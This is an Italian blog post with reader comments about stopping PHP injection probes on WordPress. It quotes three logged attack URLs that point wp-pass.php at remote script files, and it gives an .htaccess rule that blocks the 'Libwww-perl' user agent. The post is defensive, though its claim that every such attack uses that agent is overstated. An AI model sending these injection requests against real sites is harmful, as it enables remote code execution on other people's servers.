Scrivi il tuo Diario di Viaggio
Condividere le tue esperienze con i viaggiatori su "Girando il Mondo" è facile. Entra ora nella community
Effettua una ricerca
Indica con poche parole cosa stai cercando. Es: Itinerari di viaggio, guide turistiche, offerte lowcost, news di viaggo...
Cerchi un hotel?
Booking.com
Itinerari di Viaggio
Cerchi un Itinerario di Viaggio in particolare? Seleziona un continente per velocizzare la tua ricerca

Guide di Viaggio e consigli
Una moltitutine di utili guide per ogni occasione. Tutto quello che c'è da sapere per non farsi trovare mai impreparati...
WordPress: Prevenire attacchi PHP Injection.
Ti trovi in: Home » Blog News & Wordpress

Se utilizzate qualche script o servizio che sia, per controllare le statistiche del vostro sito, probabilmente avrete notato come ultimamente è sempre più facile trovare tra gli indirizzi di percorrenza dei visitatori, tentativi di accesso a link del genere:

  • /wp-pass.php?_wp_http_referer=http://www.freedom.com.pl/backup/cmd?
  • /wp-pass.php?_wp_http_referer=http://agatsuma.bestfreewebspace.net/safe3?
  • /wp-pass.php?_wp_http_referer=http://scumbag.blink-182.de/pics/pics/id.txt?

Un semplice modo per evitare che questi attacchi vadano a buon fine, è quello di inserire alcune righe all’interno del file .htaccess del vostro blog alcune righe, in modo da impedire l’accesso ai robot che si identificano tramite User-Agent “^Libwww-perl”. Il 100% di questi attacchi infatti, viene effettuato da robot identificati in questo modo. Le righe da inserire alla fine del vostro file .htaccess sono le seguenti:

SetEnvIfNoCase User-Agent “^Libwww-perl” bad_bot

Order Allow,Deny
Allow from all
Deny from env=bad_bot

Cosi facendo, vedrete che le vostre statistiche di accesso, torneranno pulite come un tempo. Utilizzando questo codice, ho anche notato che i commenti di spam bloccati da Akismet sono completamente spariti, mentre prima, ne ricevevo almeno 30 al giorno. Incuriosito da questa cosa, ho provato ad eliminare le righe dal file .htaccess, ed il giorno dopo ho ricevuto 12 commenti di spam, regolarmente bloccati da akismet.

Non so se sia stata una coincidenza, o magari i commenti vengono generati automaticamente da robot identificati allo stesso modo di quelli che provano il PHP Injection sul vostro blog oppure no, fatto stà che ora risulta tutto più “pulito e sicuro”.

Nel caso qualcuno facesse questo tentativo, vi pregherei di rendermi partecipe dei risultati ottenuti. Grazie



Tags:

Autore:

Sono stati ricevuti 5 commenti

  1. Purtroppo il mio blog gira su piattaforma Win quindi bisognerebbe inventarsi qualcos’altro per escludere i bot.
    Questi metodi vengono utilizzati da chi ha ancora la versione 2.2.1 di WordPress.
    Il fix è stato fatto dalla 2.2.2.
    Serviva per mascherare un link ad un sito malevolo con uno ad un sito trusted.

  2. [quote comment=”2185″]Purtroppo il mio blog gira su piattaforma Win quindi bisognerebbe inventarsi qualcos’altro per escludere i bot.
    Questi metodi vengono utilizzati da chi ha ancora la versione 2.2.1 di WordPress.
    Il fix è stato fatto dalla 2.2.2.
    Serviva per mascherare un link ad un sito malevolo con uno ad un sito trusted.[/quote]

    Effettivamente, ho sbadatamente omesso il particolare Unix/Windows 🙂 Grazie per la precisazione.

    Comunque dici che limitare l’accesso a quel tipo di robots può essere collegato al fatto che non ricevo più nessun commento di spam, che comunque prima venivano bloccati attraverso akismet ❓

  3. Ottima soluzione Fabio, in effetti usando gli .htaccess risolviamo il 90% dei problemi di spam e migliorando il filtro si può debellare completamente.
    C’è un piccolo problemino, quando viene fatta la ricostruzione dei permalink viene rigenerato il file .htaccess quindi dovremo di volta in volta apportare le modifiche manualmente rischiando di causare errori. Conosco molti cms che sono gia protetti da vari bot automaticamente proprio in questa maniera, dovrebbero aggiungere questi pezzi di codice direttamente nel wordpress di base 😉

  4. […] WordPress: Prevenire attacchi PHP Injection. – Girando Il Mondo […]

  5. Interessante ma non sarebbe bene spiegare come funzionano quelle direttive che si danno ad apache tramite il file .htaccess?
    Mi incuriosisce molto.

Lascia un commento

Il tuo nome (*)
E-Mail (*)

Il tuo sito web:

Offerte LowCost


La tua pubblicità
Se sei interessato a pubblicizzare le tue offerte o la tua struttura alberghiera sul nostro sito, contattaci all'indirizzo email info@girandoilmondo.it oppure tramite l'apposito modulo dei contatti.
Iscriviti al Feed
Iscriviti al Feed RSS
Tieniti aggiornato, iscriviti al nostro Feed RSS gratuito e ricevi ogni giorno gli ultimi articoli pubblicati, gratis!